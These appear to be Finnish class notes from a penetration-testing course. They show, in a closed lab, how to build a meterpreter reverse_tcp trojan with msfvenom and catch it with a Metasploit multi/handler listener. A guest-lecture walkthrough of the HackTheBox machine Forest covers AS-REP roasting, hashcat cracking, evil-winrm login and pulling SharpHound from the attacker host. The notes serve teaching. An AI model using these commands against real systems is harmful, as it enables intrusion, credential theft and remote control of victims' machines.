Tuntimuistiinpanot

• HelSec
• OWASP Helsinki
• CCG Chaos Computer Group

Tärkeitä tapahtumia ja lipunryöstöjä. Näihin voi liittyä Meetupin kaikki.

Troijalaisia

• https://app.any.run turvalliseen testaamiseen
• cincan, opettaa malwaren korkkaamista
• Veil
• MSFVenom
• FatRat
• SET, Social Engineering Toolkit
• aiheeseen on paljon kirjoja

Tuntitehtävä

msfconsole -q 
msfvenom 
getenv
show options 
./trojan 
# reverse_tcp handler, kohdekone soittaa takaisin kotiin 
sysinfo 
help 
meterpreter 
exploit multi/handler

, Bind TCP Stager
   174  payload/linux/x64/meterpreter/reverse_tcp                                    normal  No     Linux Mettle x64, Reverse TCP Stager
   175  payload/linux/x64/meterpreter_reverse_http                                   normal  No     Linux Meterpreter, Reverse HTTP Inline
   176  payload/linux/x64/meterpreter_reverse_https                                  normal  No     Linux Meterpreter, Reverse HTTPS Inline
   177  payload/linux/x64/meterpreter_reverse_tcp   

mkdir myrkky
msfvenom 
windows/meterpreter/reverse_tcp # pitää olla sama kuin multihandlerissa
# LHOST hyökkäyskone
# -f exe -o ppayload
# --encrypt 
# -a
# -x, --template 

sudo msfconsole
search multi handler
use exploit/multi/handler
show options 
# LHOST hyökkäyskone
# oma ip, koska monta verkkokorttia, interface, LPORT 4444
show payloads 
set payload linux/x64/meterpreter/meterpreter_reverse_tcp
# reverse, ei tiedetä missä orjat ottavat herraan yhteyttä
# reverse kauttaviiva tai alaviiva tcp  
# toinen staged payload, kauttaviivalla menee vaiheissa
# molempia kannattaa kokeilla, 
# bind, ajaa sen lokaalissa 
show options 
hostname -I # voi olla localhostissa 
set lhost 192..33
setg lshost options 
# use multihandler exploit, set payload, set lhost, meterpreter reverse tcp, LPORT pitää vaihtaa jos haluaa 
run 
# käynnistää palvelimen 
msfvenom 2>&1 | less
msfvenom -p (payload sama kuin toisessa terminaalissa, reverse tcp) LHOST=(hyökkäyskone ip) -f elf -h/k? EI vaan -o (output trojan tiedostoon) trojan 
# payload vihamielinen meterpreter haittaohjelma, -f elf linuxille 
# portti 
./trojan 
chmod u+x trojan
./trojan
# meterpreterille katsomaan, yksi kohdekone otti yhteyttä 
# oletusporttia ei tarvinnut asettaa
sysinfo # haittaohjelman koneella
ls -l 
ls shadow 

sudo msfconsole
exlpoit/multi/handler
set payload x64 linux meterpreter reverse tcp
hostname -I # mahdollisimman julkinen ip
msfvenom 2>&1 | grep Example

# lopputulos 
msf6 exploit(multi/handler) > hostname -I 
[*] exec: hostname -I 

192.168.233.8 
msf6 exploit(multi/handler) > set LHOST 192.168.233.8
LHOST => 192.168.233.8
msf6 exploit(multi/handler) > setg lhost options
lhost => options
msf6 exploit(multi/handler) > set LHOST 192.168.233.8
LHOST => 192.168.233.8
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.233.8:4444 
[*] Sending stage (3012548 bytes) to 192.168.233.8
[*] Meterpreter session 1 opened (192.168.233.8:4444 -> 192.168.233.8:38610) at 2021-12-07 03:12:18 -0500

Virtuaalikoneita, ohjelmia

• Modern ie, valkkaa windows virtual kone, vaatii paljon muistia
• av veil evasion, veil-evasion, thefatrat, setoolkit

Tee msfvenom troijalainen ja kokeile samalta koneelta

• Kokeile windowsilla tai eri koneelta
• Kokeile liittää haittakoodi ohjelmaan (msfvenom template)

• Kokeile jotain toista työkalua fatrat veil setoolki

• Riku Juurikko, Social Engineering
• Newsletteriä

10.40 takaisin

Troijalainen, mitä tehtiin

Luodaan lokaalissa suljetussa ympäristössä simuloitu troijalaishyökkäys omalta koneelta samalle koneelle. Ensin ajetaan hyökkääjä Kalilla MSFconsole exploit multi handler. Sitten luodaan hyökkääjällä troijalainen, joka käynnistetään omassa ympäristössä. Tämä olisi tarkoitus ujuttaa oikeassa hyökkäyksessä uhrin koneelle. Tässä käynnistetään se samalla koneella.

Troijalainen luodaan msfvenomilla näin:

mkdir myrkki # piti kirjoittaa myrkky mutta nyrkin ja myrkyn yhdistelmä myrkki on ihan hyvä
cd myrkki 
# msfvenom -p flägi tarkoittaa payloadia, pitää olla sama kuin exploitti mitä hyökkääjä ajaa
# LHOST hyökkääjän iippari
# -f format mihin output tallennetaan, linuxille elf, windowsille exe (varmaan paljon muita vaihtoehtoja molemmille myös)
# -o flägi mihin output tallennetaan
└─$ /usr/bin/msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.8 -f elf -o trojan
cat trojan # voidaan katsoa millaisen ohjelman komento teki, output alla
# muutetaan trojan-ohjelman oikeudet
chmod u+x trojan
# sitten käynnistetään troijalainen, tässä simuloimme nyt uhria
./trojan 

Troijalaisen lähdekoodi

# troijalaisen lähdekoodi 
^?ELF^B^A^A^@^@^@^@^@^@^@^@^@^B^@>^@^A^@^@^@x^@@^@^@^@^@^@@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^@8^@^A^@^@^@^@^@
^@^@^A^@^@^@^G^@^@^@^@^@^@^@^@^@^@^@^@^@@^@^@^@^@^@^@^@@^@^@^@^@^@<FA>^@^@^@^@^@^@^@|^A^@^@^@^@^@^@^@^P^@^@^@^@^@^@H1<FF>j   X<99><B6>^PH<89><D6>M1<C9>j"AZ<B2>^G^O^EH<85><C0>xQj
AYPj)X<99>j^B_j^A^^O^EH<85><C0>x;H<97>H<B9>^B^@^Q\<C0><A8><E9>^HQH<89><E6>j^PZj*X^O^EYH<85><C0>y%I<FF><C9>t^XWj#Xj^@j^EH<89><E7>H1<F6>^O^EYY_H<85><C0>y<C7>j<Xj^A_^O^E^j~Z^O^EH<85><C0>x<ED><FF><E6>

Exploit käynnistetään hyökkääjä-Kalissa näin:

exploit/multi/handler # -y
set payload 174 # linux/x64/meterpreter/reverse_tcp # kuulosti varmemmalta 
show options # katsotaan mitä optioita vaatii, LHOST hyökkääjän iippari
hostname -I # katsotaan mikä meidän ip on
set LHOST {hyökkääjäip}
# käynnistetään exploit
run

Sitten kun troijalainen ajetaan uhrikoneessa, tulee hyökkäyskoneessa ilmoitus (viimeinen rivi):

[*] Started reverse TCP handler on 192.168.233.8:4444 
[*] Sending stage (3012548 bytes) to 192.168.233.8
[*] Meterpreter session 1 opened (192.168.233.8:4444 -> 192.168.233.8:38610) at 2021-12-07 03:12:18 -0500

Vierailijaluento

Niko Heiskanen

• Vuosi kurssin jälkeen
  • HtB:ltä koneita, challengeja, labroja
• Forest retired
  • Windows AD kone
• otetaan uusi Vagrant-kone, tehdään nmap-kansio,
  • sudo nmap -sC -SV -oA
  • nähdään heti että paljon portteja auki koska kyseessä Windows-kone
  • Domain danme
  • FQDN FOREST.htb.local
• smbclient -U ‘’ -N \10.10.10.161
• rpcclient -N 10.10.10.161 (sallii anonyymikirjautumisen)

nano users.lst
impacket- # paljon työkaluja
impacket-GetNPUsers --help 
impacket-GetNPUsers -userfile users.lst -dc-ip 10.10.10.161 htb.local/
# saa tiivisteen, kopioidaan se tiedostoon hash 
# katsotaan mikä tiivisteen mode on 
cd /usr/share/wordlists 
ls 
sudo gunzip rockyou.txt.gz
ls cd - 
hashcat -m 18200 hash rockyou.txt
# salasana tiedostoon (s3rvice)
gem install evil-winrm 
evil-winrm -1 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
# saa yhteyden Windows-koneeseen
# Windowsissa käyttäjien desktopeilla flägit
sudo apt install bloodhound 
ls /opt/BloodHound/Collectors/SharpHound.ps1 
# tutkitaan AD:n rakennetta
mkdir www
SharpHound.ps1 www
python3 -m http.server
# windowsissa
iwr http://10.10.14.7:8000/SharpHound.ps1 -o sh.ps1 
ls 
. .\sh.ps1 
Invoke-BloodHound -CollectionMethod all 
# tekee zip-tiedoston missä data, se pitää siirtää Linux
sudo impacket-smbserver --help 
sudo impacket-smbserver demo $(pwd)
# takas windowsiossa
net use x: \\10.10.14.7\demo
mc *.zip 
# linuxissa
# tietokantapalvelin
sudo neo4j console 
# localhostissa:7474
# vaihda default käyttäjä ja salasana
bloodhound # laita neo4j:n pw ja user
# ladataan zippi minkä keräsi ad-ympäristöstä, analyysi
# shortest paths to highvalue targets 
# piirtää kuvan meille

Tässä vaiheessa muistiinpanojen kirjoittaja muistaa että retired koneisiin löytää walkthrought netistä, joten pausataan kirjoittaminen ja keskitytään luentoon. https://0xdf.gitlab.io/2020/03/21/htb-forest.html

AD Exploitation Cheat Sheet

HtB Academy - osittain ilmainen